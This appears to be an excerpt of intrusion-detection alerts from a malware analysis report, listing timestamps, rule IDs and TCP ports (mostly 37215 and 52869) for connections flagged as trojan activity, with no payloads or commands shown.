                      Timestamp:2024-07-20T23:01:21.281290+0200
                      SID:2027339
                      Source Port:42804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:44596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:35120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218458+0200
                      SID:2835222
                      Source Port:37938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.206164+0200
                      SID:2835222
                      Source Port:59138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.558739+0200
                      SID:2027339
                      Source Port:47360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.081648+0200
                      SID:2027339
                      Source Port:40564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.262887+0200
                      SID:2027339
                      Source Port:52076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.861229+0200
                      SID:2027339
                      Source Port:40704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.232786+0200
                      SID:2835222
                      Source Port:51490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:36240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.201073+0200
                      SID:2835222
                      Source Port:57304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:45562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.206647+0200
                      SID:2027339
                      Source Port:44382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.202997+0200
                      SID:2027339
                      Source Port:50620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:58398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.978629+0200
                      SID:2027339
                      Source Port:57824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.920436+0200
                      SID:2027339
                      Source Port:51918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.295537+0200
                      SID:2027339
                      Source Port:55444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.559701+0200
                      SID:2027339
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.186953+0200
                      SID:2835222
                      Source Port:39616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:25.607392+0200
                      SID:2027339
                      Source Port:34588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.014789+0200
                      SID:2027339
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.194402+0200
                      SID:2835222
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.177250+0200
                      SID:2835222
                      Source Port:51646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:55620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.265358+0200
                      SID:2835222
                      Source Port:58196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.445147+0200
                      SID:2835222
                      Source Port:53230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.252895+0200
                      SID:2835222
                      Source Port:54222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:57288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.383814+0200
                      SID:2027339
                      Source Port:45948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170218+0200
                      SID:2835222
                      Source Port:47450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:59806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.293486+0200
                      SID:2835222
                      Source Port:38628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.862093+0200
                      SID:2027339
                      Source Port:37328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.299570+0200
                      SID:2835222
                      Source Port:47806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.601452+0200
                      SID:2835222
                      Source Port:34110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.211994+0200
                      SID:2835222
                      Source Port:50040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.919725+0200
                      SID:2027339
                      Source Port:45992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.835694+0200
                      SID:2027339
                      Source Port:56652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.361765+0200
                      SID:2835222
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.236014+0200
                      SID:2027339
                      Source Port:60634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203029+0200
                      SID:2835222
                      Source Port:44104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.286674+0200
                      SID:2027339
                      Source Port:42622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.204357+0200
                      SID:2835222
                      Source Port:42496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.222385+0200
                      SID:2835222
                      Source Port:58804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.497886+0200
                      SID:2835222
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.027075+0200
                      SID:2027339
                      Source Port:32880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.129434+0200
                      SID:2027339
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:44056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.550419+0200
                      SID:2835222
                      Source Port:38764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.558641+0200
                      SID:2835222
                      Source Port:33796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:46764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.946714+0200
                      SID:2835222
                      Source Port:48956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.095698+0200
                      SID:2835222
                      Source Port:33456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.583414+0200
                      SID:2027339
                      Source Port:54336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:05.340054+0200
                      SID:2403348
                      Source Port:37215
                      Destination Port:34477
                      Protocol:TCP
                      Classtype:Misc Attack
                      Timestamp:2024-07-20T23:01:19.826087+0200
                      SID:2027339
                      Source Port:37134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.397150+0200
                      SID:2835222
                      Source Port:46632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:44268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:36304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.068477+0200
                      SID:2835222
                      Source Port:56422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.676428+0200
                      SID:2027339
                      Source Port:60586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.079114+0200
                      SID:2835222
                      Source Port:53720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.019040+0200
                      SID:2027339
                      Source Port:55470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:50398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.869088+0200
                      SID:2027339
                      Source Port:57358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.259313+0200
                      SID:2027339
                      Source Port:60020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.845388+0200
                      SID:2027339
                      Source Port:59650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.119631+0200
                      SID:2835222
                      Source Port:41738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:42542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.347530+0200
                      SID:2027339
                      Source Port:59766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:41368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.815913+0200
                      SID:2835222
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.861229+0200
                      SID:2027339
                      Source Port:42502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:36392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.296192+0200
                      SID:2835222
                      Source Port:44040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.267356+0200
                      SID:2835222
                      Source Port:33462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.939279+0200
                      SID:2027339
                      Source Port:49680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:48934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.264733+0200
                      SID:2027339
                      Source Port:35072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:25.227278+0200
                      SID:2027339
                      Source Port:44574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:51658
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.608712+0200
                      SID:2027339
                      Source Port:42194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:44552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.227504+0200
                      SID:2027339
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:47996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:52904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:45076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.136941+0200
                      SID:2835222
                      Source Port:57042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:35748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.108705+0200
                      SID:2835222
                      Source Port:53600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.151190+0200
                      SID:2027339
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:24.892331+0200
                      SID:2835222
                      Source Port:37222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.506018+0200
                      SID:2835222
                      Source Port:49826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.515987+0200
                      SID:2835222
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.410806+0200
                      SID:2835222
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.656262+0200
                      SID:2835222
                      Source Port:53410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.199737+0200
                      SID:2027339
                      Source Port:56664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.068327+0200
                      SID:2835222
                      Source Port:49516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.194640+0200
                      SID:2835222
                      Source Port:48356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.473907+0200
                      SID:2027339
                      Source Port:48448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.292313+0200
                      SID:2835222
                      Source Port:37348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.601975+0200
                      SID:2027339
                      Source Port:60594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.859328+0200
                      SID:2027339
                      Source Port:57682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.383814+0200
                      SID:2027339
                      Source Port:33564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.416341+0200
                      SID:2835222
                      Source Port:56366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.351771+0200
                      SID:2027339
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.116360+0200
                      SID:2027339
                      Source Port:38564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.550419+0200
                      SID:2835222
                      Source Port:39796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.631759+0200
                      SID:2027339
                      Source Port:47382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.656262+0200
                      SID:2835222
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.253482+0200
                      SID:2027339
                      Source Port:36694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.943543+0200
                      SID:2835222
                      Source Port:48624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:55680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.214202+0200
                      SID:2027339
                      Source Port:38728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.067656+0200
                      SID:2835222
                      Source Port:41596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.979517+0200
                      SID:2835222
                      Source Port:60608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.263044+0200
                      SID:2835222
                      Source Port:36278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.461356+0200
                      SID:2835222
                      Source Port:45902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.224262+0200
                      SID:2027339
                      Source Port:35420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.068327+0200
                      SID:2835222
                      Source Port:54670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:52098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:24.897385+0200
                      SID:2835222
                      Source Port:45666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.547924+0200
                      SID:2027339
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:53158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.444180+0200
                      SID:2027339
                      Source Port:50178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.276054+0200
                      SID:2027339
                      Source Port:47212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201033+0200
                      SID:2835222
                      Source Port:57576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.416548+0200
                      SID:2835222
                      Source Port:50602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.295095+0200
                      SID:2835222
                      Source Port:37174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.203275+0200
                      SID:2027339
                      Source Port:41954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.199737+0200
                      SID:2835222
                      Source Port:37926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.134238+0200
                      SID:2835222
                      Source Port:37104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.514565+0200
                      SID:2835222
                      Source Port:46562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.293559+0200
                      SID:2027339
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.328880+0200
                      SID:2027339
                      Source Port:44414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.067656+0200
                      SID:2835222
                      Source Port:51132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.809328+0200
                      SID:2027339
                      Source Port:60470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.216912+0200
                      SID:2835222
                      Source Port:37398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.812725+0200
                      SID:2027339
                      Source Port:53798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.108705+0200
                      SID:2835222
                      Source Port:36080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:37970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.443334+0200
                      SID:2027339
                      Source Port:42126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.169725+0200
                      SID:2835222
                      Source Port:60438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.848630+0200
                      SID:2027339
                      Source Port:39800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.621319+0200
                      SID:2835222
                      Source Port:39682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.861971+0200
                      SID:2027339
                      Source Port:59764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.464983+0200
                      SID:2027339
                      Source Port:38308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.435936+0200
                      SID:2835222
                      Source Port:56808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.202136+0200
                      SID:2027339
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.826663+0200
                      SID:2027339
                      Source Port:56122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:55228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:44420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.021221+0200
                      SID:2027339
                      Source Port:47164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.431931+0200
                      SID:2835222
                      Source Port:40150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.558738+0200
                      SID:2027339
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.664351+0200
                      SID:2835222
                      Source Port:46836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.938949+0200
                      SID:2027339
                      Source Port:51090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.030401+0200
                      SID:2027339
                      Source Port:36084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.199737+0200
                      SID:2027339
                      Source Port:34664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.048326+0200
                      SID:2027339
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201033+0200
                      SID:2835222
                      Source Port:52234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088422+0200
                      SID:2835222
                      Source Port:36266
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:41918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.596172+0200
                      SID:2835222
                      Source Port:54738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.580103+0200
                      SID:2027339
                      Source Port:41228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:39010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.108705+0200
                      SID:2835222
                      Source Port:49084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.229921+0200
                      SID:2027339
                      Source Port:56436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.146859+0200
                      SID:2027339
                      Source Port:56660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:50036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.654988+0200
                      SID:2835222
                      Source Port:37138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.943543+0200
                      SID:2835222
